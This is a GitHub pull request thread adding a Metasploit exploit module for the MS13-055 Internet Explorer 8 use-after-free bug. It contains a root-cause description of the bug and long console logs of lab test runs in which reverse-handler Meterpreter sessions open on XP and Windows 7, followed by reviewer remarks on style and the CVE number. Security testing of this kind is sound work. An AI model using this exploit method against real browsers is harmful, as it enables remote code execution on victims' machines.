
Add MS13-055 Internet Explorer Use-After-Free Vulnerability #2337

Merged (4 commits, Sep 9, 2013)

Conversation

@wchen-r7 (Contributor) commented Sep 9, 2013

In IE8 standards mode, it's possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement's outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it's trying to make a call to the object's SecurityContext virtual function at offset +0x70, which results in a crash. An attacker can take advantage of this by first creating a CAnchorElement object, letting it be freed, and then replacing the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user.

This bug is specific to Internet Explorer 8 only. It was originally discovered by Orange Tsai at Hitcon 2013, but was silently patched in the July 2013 update, so no CVE as of now.

Special thanks to Peter Vreugdenhil for the involvement.

Demo against XP & Win 7:

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/urQeWe
[*]  Local IP: http://10.0.1.76:8080/urQeWe
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 10.0.1.76        ms13_055_canchor - Using msvcrt ROP
[*] 10.0.1.76        ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:55279) at 2013-09-08 20:00:57 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.76:55279) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 496
[+] Successfully migrated to process 
[*] 10.0.1.79        ms13_055_canchor - Using JRE ROP
[*] 10.0.1.79        ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.79:49169) at 2013-09-08 20:01:11 -0500
[*] Session ID 2 (10.0.1.76:4444 -> 10.0.1.79:49169) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3544)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 832
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  WEI-3B699B1A81A\Administrator @ WEI-3B699B1A81A  10.0.1.76:4444 -> 10.0.1.76:55279 (10.0.1.76)
  2   meterpreter x86/win32  WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM         10.0.1.76:4444 -> 10.0.1.79:49169 (10.0.1.79)

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WEI-3B699B1A81A
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms13_055_canchor) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-6NH0Q8CJQVM
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

@jvazquez-r7 (Contributor)

Processing...

@jvazquez-r7 (Contributor)

Is it still using hard tabs? Looks like yes in my editor :?

If yes, please switch to soft tabs, and please also fix this PR using the instructions at:

https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards

If it isn't using hard tabs, then there is something weird in my editor configuration and I need to check :S Sorry in that case.

@jvazquez-r7 (Contributor)

Working on W7 / IE8:

msf exploit(ms13_055_canchor) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/5pyCaX2LWDVO
[*]  Local IP: http://192.168.0.3:8080/5pyCaX2LWDVO
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using JRE ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:51429) at 2013-09-09 08:09:20 -0500
[*] Session ID 1 (192.168.0.3:4444 -> 192.168.0.3:51429) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2520)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2984

msf exploit(ms13_055_canchor) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > [+] Successfully migrated to process 
getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y

'Payload' =>
{
'BadChars' => "\x00",
'StackAdjustment' => -3500
Contributor (inline comment on the lines above):

Looks like it shouldn't be needed because get_payload() is adding the stack adjustment code by itself

One kills a man, one is an assassin; one kills millions, one is a
conqueror; one kills a tab, one is a Metasploit dev.
@jvazquez-r7 (Contributor)

Thanks! Processing again!

@jvazquez-r7 (Contributor)

Tested on XP SP3 and Win 7 SP1:

msf exploit(ms13_055_canchor) > [*] Current server process: iexplore.exe (288)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3996
sessions -i 1
[*] Starting interaction with 1...

meterpreter > g[+] Successfully migrated to process 
etuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.219 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(ms13_055_canchor) > 
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:54000) at 2013-09-09 11:02:54 -0500
[*] Session ID 2 (192.168.0.3:4444 -> 192.168.0.3:54000) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1524)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3480
[+] Successfully migrated to process 

msf exploit(ms13_055_canchor) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > 

Some reliability issues with XP SP3 on the first shots; did several tests, and it looks good enough for me to go:

msf exploit(ms13_055_canchor) > [*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:54020) at 2013-09-09 11:05:42 -0500
[*] Session ID 3 (192.168.0.3:4444 -> 192.168.0.3:54020) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3396)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3908
[+] Successfully migrated to process 
[*] 192.168.0.3 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 4 opened (192.168.0.3:4444 -> 192.168.0.3:54022) at 2013-09-09 11:05:57 -0500
[*] Session ID 4 (192.168.0.3:4444 -> 192.168.0.3:54022) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3992)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2628
[+] Successfully migrated to process 
[*] 192.168.0.3 - Meterpreter session 4 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 5 opened (192.168.0.3:4444 -> 192.168.0.3:54025) at 2013-09-09 11:06:13 -0500
[*] Session ID 5 (192.168.0.3:4444 -> 192.168.0.3:54025) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2240)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3492

msf exploit(ms13_055_canchor) > j[+] Successfully migrated to process 
obs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(ms13_055_canchor) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.3:4444 
[*] Using URL: http://0.0.0.0:8080/eiJLfQ1IYj
[*]  Local IP: http://192.168.0.3:8080/eiJLfQ1IYj
[*] Server started.
msf exploit(ms13_055_canchor) > [*] 192.168.0.3 - Meterpreter session 5 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 6 opened (192.168.0.3:4444 -> 192.168.0.3:54037) at 2013-09-09 11:08:00 -0500
[*] Session ID 6 (192.168.0.3:4444 -> 192.168.0.3:54037) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3144)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1576
[-] Could not migrate in to process.
[-] SSL_accept SYSCALL returned=5 errno=0 state=SSLv3 read client hello B ## Because I killed the session
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] 192.168.0.3 - Meterpreter session 6 closed.  Reason: Died
[*] 192.168.0.3      ms13_055_canchor - Using msvcrt ROP
[*] 192.168.0.3      ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 7 opened (192.168.0.3:4444 -> 192.168.0.3:54042) at 2013-09-09 11:08:13 -0500
[*] Session ID 7 (192.168.0.3:4444 -> 192.168.0.3:54042) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3752)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2904
[+] Successfully migrated to process 

landing

jvazquez-r7 pushed a commit that referenced this pull request Sep 9, 2013
@jvazquez-r7 jvazquez-r7 merged commit 0ee0168 into rapid7:master Sep 9, 2013
@yenteasy

Well, I have been taking a look at https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf and this stack trace sounds familiar to me: CVE-2013-3163. A bug discovered and reported in Oct 2012. So it was not silently patched and has its CVE :)

Nice exploit btw ;)

@wchen-r7 (Contributor, Author)

Thanks yenteasy! I'm glad you told me this, because it was really painful to verify the actual CVE. Nobody else knows for sure which one. I will do another pull request to update the module, thanks!

wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Sep 13, 2013
Update info about original discovery. See rapid7#2337 too.
@yenteasy

You're welcome. Yeah, that's right, since MS is using the same title (memory corruption) for all the bugs.
By the way, I will send you a copy of my PoC by mail this weekend if you want a full verification.

Regards,
Jose.

@wchen-r7 (Contributor, Author)

That'd be great. Please feel free to e-mail to either wei_chen[at].rapid7.com, or sinn3r[at]metasploit.com. Thanks!
